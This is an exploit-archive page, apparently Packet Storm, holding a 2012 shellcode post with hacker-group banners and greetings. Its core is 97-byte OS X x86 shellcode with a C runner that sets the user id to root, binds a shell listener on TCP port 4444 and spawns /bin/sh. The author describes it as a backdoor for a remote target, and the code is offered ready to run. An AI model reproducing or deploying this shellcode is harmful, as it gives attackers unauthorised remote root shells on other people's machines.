OS X / x86 Port Binding Shellcode

OS X / x86 Port Binding Shellcode: Posted Feb 10, 2012; Authored by KedAns-Dz; 97 bytes small OS X / x86 shellcode that binds a shell to port 4444.; tags | shell, x86, shellcode; systems | apple, osx; SHA-256 | 623642c76b21d9c8b8565f08b67486e7985cda73e2d5e7e4e1a112dc36fa3cee; Download | Favorite | View

OS X / x86 Port Binding Shellcode

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm KedAns-Dz member from Inj3ct0r Team                1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

/*
###
# Title : os-x/x86 bind backdoor tcp port 4444 - 97 bytes
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com | kedans@facebook.com
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
# Web Site : www.1337day.com * www.dis9.com * exploit-id.com
# Facebook : http://facebook.com/KedAns
# platform : os-x/x86
# Type : Shellcode
# Tested on : Mac OSX .(snow leopard 10.4.11)  En
###

##
# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3   |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * Dr.55h |
# | KinG Of PiraTeS * The g0bl!n * soucha * dr.R!dE  .. |
# | ------------------------------------------------- < |
##

*/

// Using THis ShellCode t0 bind BaCkd00r in remote Target and spawn backshell

#include <stdio.h>
#include <string.h>

char sc[] =
/* setreuid (0,0) */
"\x31\xC0"     // XOR EAX,EAX
"\x50"         // PUSH EAX
"\x50"         // PUSH EAX
"\x50"         // PUSH EAX
"\xB0\x7E"     // MOV AL,7E
"\xCD\x80"     // INT 0x80

// Binding BaCkd00r
"\x31\xC0"     // XOR EAX,EAX
"\x50"         // PUSH EAX
"\x50"         // PUSH EAX
"\xB0\x17"     // MOV AL,0x17
"\xCD\x80"     // INT 0x80
"\x31\xC0"     // XOR EAX,EAX
"\x50"         // PUSH EAX
"\x68\xFF\x02\x11\x5C" // PUSH 0x5C1102FF
"\x89\xE7"     // MOV EDI,ESP
"\x50"         // PUSH EAX
"\x6A\x01"     // PUSH 0x01
"\x6A\x02"     // PUSH 0x02
"\x6A\x10"     // PUSH 0x10
"\xB0\x61"     // MOV AL,0x61
"\xCD\x80"     // INT 0x80
"\x57"         // PUSH EDI
"\x50"         // PUSH EAX
"\x50"         // PUSH EAX
"\x6A\x68"     // PUSH 0x68
"\x58"         // POP EAX
"\xCD\x80"     // INT 0x80
"\x89\x47\xEC"   // MOV DWORD ,EAX
"\xB0\x6A"     // MOV AL,0x6A
"\xCD\x80"     // INT 0x80
"\xB0\x1E"     // MOV AL,0x1E
"\xCD\x80"     // INT 0x80
"\x50"         // PUSH EAX
"\x50"         // PUSH EAX
"\x6A\x5A"     // PUSH 0x5A
"\x58"         // POP EAX
"\xCD\x80"     // INT 0x80
"\xFF\x4F\xE4" // DEC DWORD ,EDI
"\x79\xF6"     // JNS SHORT
"\x50"         // PUSH EAX
"\x68\x2F\x2F\x73\x68"  // PUSH 0x68732F2F
"\x68\x2F\x62\x69\x6E"  // PUSH 0x6E69622F
"\x89\xE3"     // MOV EBX,ESP
"\x50"         // PUSH EAX
"\x54"         // PUSH ESP
"\x54"         // PUSH ESP
"\x53"         // PUSH EBX
"\x50"         // PUSH EAX
"\xB0\x3B"     // MOV AL,0x3B
"\xCD\x80";    // INT 0x80

int main()
{
    int (*dz)() = (int(*)())sc;
        printf("bytes: %u\n", strlen(sc));
        dz();
}

/*
#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=====================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > || Rizky Ariestiyansyah * Islam Caddy ..
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re * CrosS (www.1337day.com) 
# Inj3ct0r Members 31337 : Indoushka * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * 
# Angel Injection (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * Sec4ever
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X
# Kha&miX * Str0ke * JF * Ev!LsCr!pT_Dz * KinG Of PiraTeS * www.packetstormsecurity.org * TreX
# www.metasploit.com * UE-Team & I-BackTrack * r00tw0rm.com * All Security and Exploits Webs ..
#================================================================================================*/

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

OS X / x86 Port Binding Shellcode

OS X / x86 Port Binding Shellcode

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

OS X / x86 Port Binding Shellcode

Share This

OS X / x86 Port Binding Shellcode

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems